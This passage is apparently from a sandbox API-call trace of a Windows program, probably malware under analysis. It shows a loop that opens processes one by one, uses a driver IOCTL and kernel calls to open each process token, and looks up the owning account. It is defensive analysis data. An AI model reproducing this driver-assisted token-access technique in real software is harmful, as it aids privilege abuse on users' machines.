dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.900] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8002084b30, HandleInformation=0x0) returned 0x0 [0184.900] ObOpenObjectByPointer (in: Object=0xfffffa8002084b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0184.900] ObfDereferenceObject (Object=0xfffffa8002084b30) returned 0x14 [0184.900] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa80020ab4c0 | out: TokenHandle=0xfffffa80020ab4c0*=0xc0) returned 0x0 [0184.900] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0184.900] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.900] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.900] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.902] CloseHandle (hObject=0xc0) returned 1 [0184.902] CloseHandle (hObject=0xc4) returned 1 [0184.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6c0) returned 0xc4 [0184.902] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.902] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa800208e620, HandleInformation=0x0) returned 0x0 [0184.902] ObOpenObjectByPointer (in: Object=0xfffffa800208e620, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0184.902] ObfDereferenceObject (Object=0xfffffa800208e620) returned 0x14 [0184.903] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa80020ab4c0 | out: TokenHandle=0xfffffa80020ab4c0*=0xc0) returned 0x0 [0184.903] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0184.903] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.903] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.903] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.905] CloseHandle (hObject=0xc0) returned 1 [0184.905] CloseHandle (hObject=0xc4) returned 1 [0184.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x348) returned 0xc4 [0184.905] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.905] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa800209d060, HandleInformation=0x0) returned 0x0 [0184.905] ObOpenObjectByPointer (in: Object=0xfffffa800209d060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0184.905] ObfDereferenceObject (Object=0xfffffa800209d060) returned 0x14 [0184.905] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa80020ab4c0 | out: TokenHandle=0xfffffa80020ab4c0*=0xc0) returned 0x0 [0184.905] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0184.905] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.906] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.906] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.908] CloseHandle (hObject=0xc0) returned 1 [0184.908] CloseHandle (hObject=0xc4) returned 1 [0184.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xc4 [0184.908] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.908] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8003910240, HandleInformation=0x0) returned 0x0 [0184.908] ObOpenObjectByPointer (in: Object=0xfffffa8003910240, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0184.909] ObfDereferenceObject (Object=0xfffffa8003910240) returned 0x14 [0184.909] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa80020ab4c0 | out: TokenHandle=0xfffffa80020ab4c0*=0xc0) returned 0x0 [0184.909] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0184.909] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.909] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.909] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.912] CloseHandle (hObject=0xc0) returned 1 [0184.912] CloseHandle (hObject=0xc4) returned 1 [0184.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x54c) returned 0xc4 [0184.912] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.912] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8001f49b30, HandleInformation=0x0) returned 0x0 [0184.912] ObOpenObjectByPointer (in: Object=0xfffffa8001f49b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0184.912] ObfDereferenceObject (Object=0xfffffa8001f49b30) returned 0x14 [0184.912] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa80020ab4c0 | out: TokenHandle=0xfffffa80020ab4c0*=0xc0) returned 0x0 [0184.912] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0184.913] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.913] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.913] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.915] CloseHandle (hObject=0xc0) returned 1 [0184.915] CloseHandle (hObject=0xc4) returned 1 [0184.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xc4 [0184.915] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.915] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8001fc5b30, HandleInformation=0x0) returned 0x0 [0184.915] ObOpenObjectByPointer (in: Object=0xfffffa8001fc5b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0184.916] ObfDereferenceObject (Object=0xfffffa8001fc5b30) returned 0x14 [0184.916] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa80020ab4c0 | out: TokenHandle=0xfffffa80020ab4c0*=0xc0) returned 0x0 [0184.916] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0184.916] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.916] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.916] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.918] CloseHandle (hObject=0xc0) returned 1 [0184.919] CloseHandle (hObject=0xc4) returned 1 [0184.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x318) returned 0xc4 [0184.919] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.919] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8001fe3b30, HandleInformation=0x0) returned 0x0 [0184.919] ObOpenObjectByPointer (in: Object=0xfffffa8001fe3b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0184.919] ObfDereferenceObject (Object=0xfffffa8001fe3b30) returned 0x14 [0184.919] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa80020ab4c0 | out: TokenHandle=0xfffffa80020ab4c0*=0xc0) returned 0x0 [0184.919] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0184.919] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.919] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.919] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.922] CloseHandle (hObject=0xc0) returned 1 [0184.922] CloseHandle (hObject=0xc4) returned 1 [0184.922] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x524) returned 0xc4 [0184.922] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.922] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8001ff7950, HandleInformation=0x0) returned 0x0 [0184.922] ObOpenObjectByPointer (in: Object=0xfffffa8001ff7950, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0184.922] ObfDereferenceObject (Object=0xfffffa8001ff7950) returned 0x14 [0184.922] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa80020ab4c0 | out: TokenHandle=0xfffffa80020ab4c0*=0xc0) returned 0x0 [0184.923] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0184.923] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.923] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.923] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.925] CloseHandle (hObject=0xc0) returned 1 [0184.925] CloseHandle (hObject=0xc4) returned 1 [0184.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x804) returned 0xc4 [0184.925] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.925] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8002023890, HandleInformation=0x0) returned 0x0 [0184.925] ObOpenObjectByPointer (in: Object=0xfffffa8002023890, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0184.925] ObfDereferenceObject (Object=0xfffffa8002023890) returned 0x14 [0184.925] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa80020ab4c0 | out: TokenHandle=0xfffffa80020ab4c0*=0xc0) returned 0x0 [0184.925] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0184.925] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.925] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.926] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.928] CloseHandle (hObject=0xc0) returned 1 [0184.928] CloseHandle (hObject=0xc4) returned 1 [0184.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x814) returned 0xc4 [0184.928] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.928] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8002040640, HandleInformation=0x0) returned 0x0 [0184.928] ObOpenObjectByPointer (in: Object=0xfffffa8002040640, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0184.928] ObfDereferenceObject (Object=0xfffffa8002040640) returned 0x14 [0184.928] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa80020ab4c0 | out: TokenHandle=0xfffffa80020ab4c0*=0xc0) returned 0x0 [0184.928] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0184.928] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.929] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.929] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.931] CloseHandle (hObject=0xc0) returned 1 [0184.931] CloseHandle (hObject=0xc4) returned 1 [0184.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x824) returned 0xc4 [0184.931] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.931] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8002088b30, HandleInformation=0x0) returned 0x0 [0184.932] ObOpenObjectByPointer (in: Object=0xfffffa8002088b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0184.932] ObfDereferenceObject (Object=0xfffffa8002088b30) returned 0x14 [0184.932] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa80020ab4c0 | out: TokenHandle=0xfffffa80020ab4c0*=0xc0) returned 0x0 [0184.932] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0184.932] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.932] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.932] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.934] CloseHandle (hObject=0xc0) returned 1 [0184.934] CloseHandle (hObject=0xc4) returned 1 [0184.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x834) returned 0xc4 [0184.934] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.935] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8002095470, HandleInformation=0x0) returned 0x0 [0184.935] ObOpenObjectByPointer (in: Object=0xfffffa8002095470, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0184.935] ObfDereferenceObject (Object=0xfffffa8002095470) returned 0x14 [0184.935] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa80020ab4c0 | out: TokenHandle=0xfffffa80020ab4c0*=0xc0) returned 0x0 [0184.935] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0184.935] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.935] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.935] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, 